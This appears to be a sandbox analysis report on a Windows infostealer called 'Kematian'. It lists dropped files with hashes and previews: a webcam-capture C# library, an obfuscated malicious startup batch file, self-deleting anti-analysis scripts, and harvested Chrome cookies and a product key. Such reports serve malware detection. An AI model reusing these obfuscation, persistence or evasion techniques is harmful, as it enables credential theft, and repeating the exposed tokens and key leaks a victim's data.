                                      Preview:. using System; . using System.Collections.Generic; . using System.Text; . using System.Collections; . using System.Runtime.InteropServices; . using System.ComponentModel; . using System.Data; . using System.Drawing; . using System.Windows.Forms; . . namespace WebCamLib . { . public class Device . { . private const short WM_CAP = 0x400; . private const int WM_CAP_DRIVER_CONNECT = 0x40a; . private const int WM_CAP_DRIVER_DISCONNECT = 0x40b; . private const int WM_CAP_EDIT_COPY = 0x41e; . private const int WM_CAP_SET_PREVIEW = 0x432; . private const int WM_CAP_SET_OVERLAY = 0x433; . private const int WM_CAP_SET_PREVIEWRATE = 0x434; . private const int WM_CAP_SET_SCALE = 0x435; . private const int WS_CHILD = 0x40000000; . private const int WS_VISIBLE = 0x10000000; . . [DllImport("avicap32.dll")] . protect

                                      C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.cmdline

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (717), with no line terminators
                                      Category:dropped
                                      Size (bytes):720
                                      Entropy (8bit):5.354325474817099
                                      Encrypted:false
                                      SSDEEP:12:p37Lvkmb6KOkrk+ik9k2Lkqe1xhZP5uWZEJZP5j:V3ka6KOk9k+kqeDP5vEvP5j
                                      MD5:1203F65DC3662C767643C3AB68504A0D
                                      SHA1:2ED95F565384E40B63A44E5B8AA0E0C6F681D10C
                                      SHA-256:A763BDB206A15884F757F72715C1102DA8687058266202545F60D9D91E6A03C2
                                      SHA-512:C71B0BAA07079AF00F63CB84E217D061DDADDA940B5E9D5164D54756F43748C34D83E52E080B3939CD9D11F5B9DF51F0084E58C0619A0A52B49587D3910186BD
                                      Malicious:true
                                      Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /out:"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.0.cs"

                                      C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.dll

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):5632
                                      Entropy (8bit):4.168554394940876
                                      Encrypted:false
                                      SSDEEP:96:iNvaPdSdn2OlGYPdHCHkVM2oQVK6zMFXmuK:iNvaFAcYPdH0kVM4VK6zMM
                                      MD5:4F782C3B153429353F8592234915B07B
                                      SHA1:DF0FCAE9DB36C38F0C373A8BEB2D35D9ED910867
                                      SHA-256:894022D00948D22C39173567E7C45CD8A6B5E387CFDBD0AA579AAF76E3ED3140
                                      SHA-512:C24FE2A45FAB3AEBFD280A0E94A8B0BA94BC306FACB6A77F790D62981B0018B14DF834558B66733D1B5AE0281C271C4DF94F101D76CD712F83F9A3A604BA0BCA
                                      Malicious:false
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..f...........!................>-... ...@....... ....................................@..................................,..K....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ -......H.......\"..............................................................:.(......}....*..{....*"..}....*..{....*"..}....*..(....*....0...........{....(........ ...P......(....}.....{.... .....{..........(.....1[.{.... 5..........(....&.{.... 4....B......(....&.{.... 2..........(....&.{..........(....&*..0..!.........o.....o.....o.......(....(....*f.{.... ...........(....&*..{.... .....{..........(....&.{....(....&*...0..}.......r...p.do.....r...p.do.......+@....d...d(....,+.s

                                      C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.out

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (803), with CRLF, CR line terminators
                                      Category:modified
                                      Size (bytes):1224
                                      Entropy (8bit):5.40995336721713
                                      Encrypted:false
                                      SSDEEP:24:KwId3ka6KOk9k+kqeDP5vEvP5CKax5DqBVKVrdFAMBJTH:xkka6Nk9k+kqeDP5vEvP5CK2DcVKdBJj
                                      MD5:67F097F158D781971A623CDE7A1605E6
                                      SHA1:0817A39A745C1D6302260E4373BD1726C6BDADC4
                                      SHA-256:59CAF5564CF6BC0C4D484CC6B611A729A228F3D9F1B06CC91585AFA1A8E1DAE7
                                      SHA-512:95D60F3334CEFEAB01DD61D07F726F7C36DE028235C4490399ABE871AFD904EA48D3119A30BE2A20F5851910978C835C568FA0E4E49310F44B055B29D5D729CC
                                      Malicious:false
                                      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /out:"C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\bekownh2\bekownh2.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET F

                                      C:\Users\user\AppData\Local\Temp\cards.json

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):4
                                      Entropy (8bit):1.5
                                      Encrypted:false
                                      SSDEEP:3:s:s
                                      MD5:37A6259CC0C1DAE299A7866489DFF0BD
                                      SHA1:2BE88CA4242C76E8253AC62474851065032D6833
                                      SHA-256:74234E98AFE7498FB5DAF1F36AC2D78ACC339464F950703B8C019892F982B90B
                                      SHA-512:04F8FF2682604862E405BF88DE102ED7710AC45C1205957625E4EE3E5F5A2241E453614ACC451345B91BAFC88F38804019C7492444595674E94E8CF4BE53817F
                                      Malicious:false
                                      Preview:null

                                      C:\Users\user\AppData\Local\Temp\cookies_netscape_Chrome.txt

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text
                                      Category:dropped
                                      Size (bytes):288
                                      Entropy (8bit):5.848201849607824
                                      Encrypted:false
                                      SSDEEP:6:PkopYjtLgxbqCRopYxA6WDwyXfaaW3UnhzrWgOsH6/8hwDFI0BFOqvm:copYKNopYxaDxva3UhyL/8ObWN
                                      MD5:A078A91D09F7B2F47BA3BB1501356E96
                                      SHA1:22D8AFDE06015A67D75D5DDA76A3CD27AE1A4E14
                                      SHA-256:9C4CE3823D3039D9DD9D8B6FD9827B358B79F75FA01620B1906CCB6C0D35A707
                                      SHA-512:C06F29B7DE191F9368B4C7E94E891DABFAA7646DE59431EB036B886246E0A3564748E81819D147EE5FEEDEACD4D494DF06997530CE5483DEBB4BDB85AA84A973
                                      Malicious:false
                                      Preview:.google.com.FALSE./.FALSE.13343557341976489.1P_JAR.2023-10-05-07..google.com.FALSE./.TRUE.13356776540976533.NID.511=nNadqW9uTcY0OP6I3afnr71o6EzaYLsdpW4UEYN3vYq_rbRrNFxM1jozPGuhjORBZKKMz2tdDpVe7dNuTWp4CyK-zt5Is6wVElveWAfKQgwNJiKKtXHCCCmrlgzZTl5CiKjTeA2iQqf6zlRK2h8wg1hVpIsWsaKqaWJyHMPF3JA.

                                      C:\Users\user\AppData\Local\Temp\discord.json

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):4
                                      Entropy (8bit):1.5
                                      Encrypted:false
                                      SSDEEP:3:s:s
                                      MD5:37A6259CC0C1DAE299A7866489DFF0BD
                                      SHA1:2BE88CA4242C76E8253AC62474851065032D6833
                                      SHA-256:74234E98AFE7498FB5DAF1F36AC2D78ACC339464F950703B8C019892F982B90B
                                      SHA-512:04F8FF2682604862E405BF88DE102ED7710AC45C1205957625E4EE3E5F5A2241E453614ACC451345B91BAFC88F38804019C7492444595674E94E8CF4BE53817F
                                      Malicious:false
                                      Preview:null

                                      C:\Users\user\AppData\Local\Temp\downloads.json

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):4
                                      Entropy (8bit):1.5
                                      Encrypted:false
                                      SSDEEP:3:s:s
                                      MD5:37A6259CC0C1DAE299A7866489DFF0BD
                                      SHA1:2BE88CA4242C76E8253AC62474851065032D6833
                                      SHA-256:74234E98AFE7498FB5DAF1F36AC2D78ACC339464F950703B8C019892F982B90B
                                      SHA-512:04F8FF2682604862E405BF88DE102ED7710AC45C1205957625E4EE3E5F5A2241E453614ACC451345B91BAFC88F38804019C7492444595674E94E8CF4BE53817F
                                      Malicious:false
                                      Preview:null

                                      C:\Users\user\AppData\Local\Temp\history.json

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):4
                                      Entropy (8bit):1.5
                                      Encrypted:false
                                      SSDEEP:3:s:s
                                      MD5:37A6259CC0C1DAE299A7866489DFF0BD
                                      SHA1:2BE88CA4242C76E8253AC62474851065032D6833
                                      SHA-256:74234E98AFE7498FB5DAF1F36AC2D78ACC339464F950703B8C019892F982B90B
                                      SHA-512:04F8FF2682604862E405BF88DE102ED7710AC45C1205957625E4EE3E5F5A2241E453614ACC451345B91BAFC88F38804019C7492444595674E94E8CF4BE53817F
                                      Malicious:false
                                      Preview:null

                                      C:\Users\user\AppData\Local\Temp\passwords.json

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):4
                                      Entropy (8bit):1.5
                                      Encrypted:false
                                      SSDEEP:3:s:s
                                      MD5:37A6259CC0C1DAE299A7866489DFF0BD
                                      SHA1:2BE88CA4242C76E8253AC62474851065032D6833
                                      SHA-256:74234E98AFE7498FB5DAF1F36AC2D78ACC339464F950703B8C019892F982B90B
                                      SHA-512:04F8FF2682604862E405BF88DE102ED7710AC45C1205957625E4EE3E5F5A2241E453614ACC451345B91BAFC88F38804019C7492444595674E94E8CF4BE53817F
                                      Malicious:false
                                      Preview:null

                                      C:\Users\user\AppData\Local\Temp\screenshot.png

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):674549
                                      Entropy (8bit):7.924330425619594
                                      Encrypted:false
                                      SSDEEP:12288:eRcPJu13ziUwfs6SLSN56UEiHzHeo2nyGc7ENH4:eyPqDp6LN56U57eogVNH4
                                      MD5:6FF568EED5715354A36DAC739921A2E6
                                      SHA1:B1E923053D50BC4BEAF18E915E9300E4C9270A1B
                                      SHA-256:6A0302925A54C2236A65502A65095F417504A163FC15333500BF37086F81406B
                                      SHA-512:3B685404C8061738A9D06B8F656277DB5F29EB62D0C304EE57EE439C790EAB98E70F060C0F9ACF7AC6580233DAF9F1D9F0A915DF54AC554B1CCAB0A8281993A8
                                      Malicious:false
                                      Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w..W...g...L.L.L...v....=..;3....4mf.1.^ !.........^...{h..K......`........}n.O..['.*...$D).{.9...O .s.w08..b.s.wL........Yg.`U.g...o*.a.u3|.............R.|.E.;.,......w..}...."..y..vc.^........gx..(..o[.K..wf2|E9w.K.....o[..SF._v.x.c.f..o.......o...A./..Xz.7v/...B.....b.a..7..97.....g...n...3.._..g.3.....0f.i_...~e]..r}.......8.-.K....O*..[.....m....0f..f....{.q.....,=.s.-......N@l.c?_ik\.k.0|.g.s...[.K..n.....-..n.1.....n..k.m.q]...O.`..?UYz.u$...p.X..a[...1<.n..IWw.....R..Y*.-'..zR...=.....<..rU...C...v>............+*.e{..1...jl.C..=..P.gq|........sy7x.euN|.C.w+1.B=....v...e.F..1n....G]Rs...s.G_Z..[*...B..>..n.1....[........t.8.......s.<.2n.p..t9...t.#/.....s....].....1.a.1..88...n./.l=.|n!.e$F~G.Y........kc[.X.?..y.'+....G...%_p.t..+[..DYSS.../..u..+..Z>..OtK.....^.o.......c...+.9x.{.w.V..Zr...et...Rw......91.8y ....;/.X.|..G......

                                      C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-03)-(UTC-5)\DomainDetects\Chrome.txt

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):16
                                      Entropy (8bit):3.577819531114783
                                      Encrypted:false
                                      SSDEEP:3:duSXpvn:ISZvn
                                      MD5:754C4C8058C42A330C780C9D5CE6528C
                                      SHA1:FF78F2F701D67B3D33B154ED56BD7038AFD6523F
                                      SHA-256:72010DCCC9ADDF8030577AA792F7E934F7D2F0CA912DF6B745CB2EB380B8CC99
                                      SHA-512:4733C7193B1BEA25D57D50B86AE3FB1429F5EEB6508DE692AC1280DFD3299E78235CD8E4E7883D5B76CBC972597E01170FA067633824F49CBA24826A3DB6C4D9
                                      Malicious:false
                                      Preview:google.com (2)..

                                      C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-03)-(UTC-5)\DomainDetects\Edge.txt

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):2
                                      Entropy (8bit):1.0
                                      Encrypted:false
                                      SSDEEP:3:y:y
                                      MD5:81051BCC2CF1BEDF378224B0A93E2877
                                      SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                      SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                      SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                      Malicious:false
                                      Preview:..

                                      C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-03)-(UTC-5)\DomainDetects\Firefox.txt

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):2
                                      Entropy (8bit):1.0
                                      Encrypted:false
                                      SSDEEP:3:y:y
                                      MD5:81051BCC2CF1BEDF378224B0A93E2877
                                      SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                      SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                      SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                      Malicious:false
                                      Preview:..

                                      C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-03)-(UTC-5)\System.txt

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, LF line terminators
                                      Category:dropped
                                      Size (bytes):28796
                                      Entropy (8bit):4.276576259670964
                                      Encrypted:false
                                      SSDEEP:768:29uDXpPqJiPbkWVw3u54494z5058dG5c595r5g5y5t535f5h5R5d5q5J5253585z:suDXpPqJiPbkWVw3u54494z5058dG5ci
                                      MD5:C0120D0FC36E47A10000D2B4B80B60C2
                                      SHA1:230CD71638158882916B5E2F65F5E56BACDCC93C
                                      SHA-256:840C78211C56AA0B59F9F922D0A43DC553FBC471C20B57DC643CE6396BB262B2
                                      SHA-512:0BA65A7F0F5AA49055C5431D424A50C78B603FE883FFC3DB4D6143A507FB06FEA84F6857FB14895B9C3617D4822F86BD08C85DBAEE61575BD32047EFBE1E082C
                                      Malicious:false
                                      Preview:....................................................................................................................................... ............... .... ...... ............ ...... .... ... ......................... ...... ... ............... ....... ................. ...................................... ... ...........................

                                      C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-03)-(UTC-5)\productkey.txt

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):64
                                      Entropy (8bit):3.2135160449350533
                                      Encrypted:false
                                      SSDEEP:3:QRirkYhl8GnMG1olNlP9:QRTY4hXN9
                                      MD5:96E51190B70C10705DE824B2389733E1
                                      SHA1:260B2EC0893E7072E9AD9C6CE5755339BFA41769
                                      SHA-256:23D7CED40FB7D942C6A280A795FF42D02C7A5D5554EB3E417699419A7B067D37
                                      SHA-512:AD847349BDBEEFC480C923D217B2BBA62900C0983BCF08D5AE5AC3BED091113B1676A9D352CE2AAC3D88AA9E6ED730EFEFF86FC42F64A2373221ED9946E7C126
                                      Malicious:false
                                      Preview:..9.7.W.T.N.-.W.Y.7.D.4.-.G.8.V.3.T.-.C.H.K.P.W.-.2.G.Y.P.4.....

                                      C:\Users\user\AppData\Roaming\Kematian\US-(user-PC)-(2024-07-03)-(UTC-5)\screenshot.png (copy)

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                      Category:dropped
                                      Size (bytes):674549
                                      Entropy (8bit):7.924330425619594
                                      Encrypted:false
                                      SSDEEP:12288:eRcPJu13ziUwfs6SLSN56UEiHzHeo2nyGc7ENH4:eyPqDp6LN56U57eogVNH4
                                      MD5:6FF568EED5715354A36DAC739921A2E6
                                      SHA1:B1E923053D50BC4BEAF18E915E9300E4C9270A1B
                                      SHA-256:6A0302925A54C2236A65502A65095F417504A163FC15333500BF37086F81406B
                                      SHA-512:3B685404C8061738A9D06B8F656277DB5F29EB62D0C304EE57EE439C790EAB98E70F060C0F9ACF7AC6580233DAF9F1D9F0A915DF54AC554B1CCAB0A8281993A8
                                      Malicious:false
                                      Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w..W...g...L.L.L...v....=..;3....4mf.1.^ !.........^...{h..K......`........}n.O..['.*...$D).{.9...O .s.w08..b.s.wL........Yg.`U.g...o*.a.u3|.............R.|.E.;.,......w..}...."..y..vc.^........gx..(..o[.K..wf2|E9w.K.....o[..SF._v.x.c.f..o.......o...A./..Xz.7v/...B.....b.a..7..97.....g...n...3.._..g.3.....0f.i_...~e]..r}.......8.-.K....O*..[.....m....0f..f....{.q.....,=.s.-......N@l.c?_ik\.k.0|.g.s...[.K..n.....-..n.1.....n..k.m.q]...O.`..?UYz.u$...p.X..a[...1<.n..IWw.....R..Y*.-'..zR...=.....<..rU...C...v>............+*.e{..1...jl.C..=..P.gq|........sy7x.euN|.C.w+1.B=....v...e.F..1n....G]Rs...s.G_Z..[*...B..>..n.1....[........t.8.......s.<.2n.p..t9...t.#/.....s....].....1.a.1..88...n./.l=.|n!.e$F~G.Y........kc[.X.?..y.'+....G...%_p.t..+[..DYSS.../..u..+..Z>..OtK.....^.o.......c...+.9x.{.w.V..Zr...et...Rw......91.8y ....;/.X.|..G......

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fr.bat

                                      Download File
                                      Process:C:\Windows\System32\cmd.exe
                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
                                      Category:dropped
                                      Size (bytes):3533346
                                      Entropy (8bit):1.9414032132906245
                                      Encrypted:false
                                      SSDEEP:1536:r9M37hEimNW4QbAjC5SMd0aF00kd5Regk1IcIoJkFVcKaoowmgd27/:IENXCbiae0kjRep6VcEo/gUT
                                      MD5:07F9549BA0E65BB2BD47FCF55C60A608
                                      SHA1:50F97F17245B1967AE322F5A72F48184DB4932FA
                                      SHA-256:84617E9C081B6B585582D2589AACE5A0A7887283F9488B5A6D05906F94116F36
                                      SHA-512:D9C2E350D2E963B64C6DA7519CDBF15A56A61131098D608721D2E0773E6632B4CB89B90165B212B83B271B5F136539DFE3586DBEEF8DB6BEDC0D358B8D02CD41
                                      Malicious:true
                                      Preview:..%sBGJojn%>%jKpHiLR%%xDQJTinE%n%SdAfnvusu%%UgNAdjtTS%u%gEZdYfoA%%uzzjGCr%l%zXscVspWK% %TpcLLPsm%2%ZUvRrJQi%%KgNnkvXk%>%mPpRlgDw%%yPjRqBuh%&%FRAZRggHP%%PRiNzPV%1%wZMOrDEY% %vxkweCz%&%UVPDLjjQa%%rVXZmvidH%&%XaIqcXf% %BPXzfTWrq%e%EISUQJc%%fuAEHohYE%x%BlchwEB%%zHBoUmogE%i%ZRlMUPcNm%%FeRwZaR%t%qHCXnaTYq% %BMBdSsX%>%BCtopPcU%%vHXTLMhA%n%sDhJBLh%%eANkvCax%u%xvtjOYl%%dicRMWtmB%l%ChngOuw% %WBBqqhiR%2%DHxykRen%%hiwGRkPEO%>%AciBtYYi%%FMkAQfJ%&%XmARtfiWn%%SwhtKvA%1%eaZMaMfA% %yqCgLJlp%|%YwTfJdaz%%eSvaxLCe%|%VwCwQyEz% %MDpFyVSc%c%DOOoUwhC%%kqcXpLma%l%tpCqygaM%%FmPfvnC%s%xxcOdRCC% ....%qGSXGbla%@%NmsSyzYgi%%wGylWZlD%e%pxdCqitHH%%qWtOKwE%c%tKaprNB%%NZedZxwFC%h%XxCXhXSM%%OfDHQtMM%o%FWsRqDuj% %UjsgQlAV%o%IMTcGRjVy%%FAPEfcV%f%itDYSUX%%uRZScfbyH%f%UyAYUpV% ....%qOdJkjJVn%e%rYDBBZSB%%gsiEHLSuI%c%BqmSWdjo%%nThLPHite%h%ZdLdtYgq%%qZtzhyaKQ%o%nqHwECgu% %cVmvdxvr%@%VvIxQsqw%%EeuHaOnb%e%bSjHZQTx%%puhaqiq%c%xHRdONb%%GvOEesz%h%vTZROzIz%%CCnQisg%o%KwcBRnMV% %CdaDKud%o%IAWCjCY%%YksCdrz%f%DCuRgbH%%QuiHXRToQ%f%jRvVu

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fr.bat:Zone.Identifier

                                      Download File
                                      Process:C:\Windows\System32\cmd.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:false
                                      Preview:[ZoneTransfer]....ZoneId=0

                                      C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm

                                      Download File
                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):32768
                                      Entropy (8bit):0.017262956703125623
                                      Encrypted:false
                                      SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                      MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                      SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                      SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                      SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                      Malicious:false
                                      Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                      C:\Users\user\Desktop\kdotLffirs.bat

                                      Download File
                                      Process:C:\Windows\System32\cmd.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):179
                                      Entropy (8bit):4.690387688466169
                                      Encrypted:false
                                      SSDEEP:3:mKDDgvJxwuMW0naRRRNvHtSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9cSR0vt2hQI1iAMLg34jAxg9EZn
                                      MD5:B820D9D4738F84B00FAC4A544E00D7C7
                                      SHA1:E890C157DFE0248D05A06257B0A086D55EBCC0F5
                                      SHA-256:B4D7AB7C0EAE6B7B75B9B5898E418C50132055E9EBA21F3418DF180AD9A68342
                                      SHA-512:A28EF9F02F8D6DD058EFE674DB07DE2E002718A00FFF8E92F0820F8DEB0AEB5A719D423D646430FAFFB45F24C740D2EA49671D189E507A87DF6588D3B42CFB54
                                      Malicious:false
                                      Preview:@echo off ..findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..

                                      C:\Users\user\Desktop\kdotqxeWQd.bat

                                      Download File
                                      Process:C:\Windows\System32\cmd.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):179
                                      Entropy (8bit):4.690387688466169
                                      Encrypted:false
                                      SSDEEP:3:mKDDgvJxwuMW0naRRRNvHtSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9cSR0vt2hQI1iAMLg34jAxg9EZn
                                      MD5:B820D9D4738F84B00FAC4A544E00D7C7
                                      SHA1:E890C157DFE0248D05A06257B0A086D55EBCC0F5
                                      SHA-256:B4D7AB7C0EAE6B7B75B9B5898E418C50132055E9EBA21F3418DF180AD9A68342
                                      SHA-512:A28EF9F02F8D6DD058EFE674DB07DE2E002718A00FFF8E92F0820F8DEB0AEB5A719D423D646430FAFFB45F24C740D2EA49671D189E507A87DF6588D3B42CFB54
                                      Malicious:false
                                      Preview:@echo off ..findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..

                                      C:\Users\user\Desktop\kdotsmFuj.bat

                                      Download File
                                      Process:C:\Windows\System32\cmd.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):179
                                      Entropy (8bit):4.690387688466169
                                      Encrypted:false
                                      SSDEEP:3:mKDDgvJxwuMW0naRRRNvHtSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9cSR0vt2hQI1iAMLg34jAxg9EZn
                                      MD5:B820D9D4738F84B00FAC4A544E00D7C7
                                      SHA1:E890C157DFE0248D05A06257B0A086D55EBCC0F5
                                      SHA-256:B4D7AB7C0EAE6B7B75B9B5898E418C50132055E9EBA21F3418DF180AD9A68342
                                      SHA-512:A28EF9F02F8D6DD058EFE674DB07DE2E002718A00FFF8E92F0820F8DEB0AEB5A719D423D646430FAFFB45F24C740D2EA49671D189E507A87DF6588D3B42CFB54
                                      Malicious:false
                                      Preview:@echo off ..findstr /i "echo" "C:\Users\user\Desktop\thegreatestexecutor.bat" ..if %errorlevel% == 0 ( taskkill /f /im cmd.exe ) else ( (goto) 2>nul & del "%~f0" ) ..

                                      C:\Users\user\Desktop\kdotzASik.bat

                                      Download File
                                      Process:C:\Windows\System32\cmd.exe
                                      File Type:DOS batch file, ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):179
                                      Entropy (8bit):4.690387688466169
                                      Encrypted:false
                                      SSDEEP:3:mKDDgvJxwuMW0naRRRNvHtSvQX4AThQoV1REJOMWW8I/i3IFPbAxg98VEyn:hO/wu9cSR0vt2hQI1iAMLg34jAxg9EZn
                                      MD5:B820D9D4738F84B00FAC4A544E00D7C7
                                      SHA1:E890C157DFE0248D05A06257B0A086D55EBCC0F5
                                      SHA-256:B4D7AB7C0EAE6B7B75B9B5898E418C50132055E9EBA21F3418DF180AD9A68342
                                      SHA-512:A28EF9F02F8D6DD058EFE674DB07DE2E002718A00FFF8E92F0820F8DEB0AEB5A719D423D646430FAFFB45F24C740D2EA49671D189E507A87DF6588D3B42CFB54
                                      Malicious:false
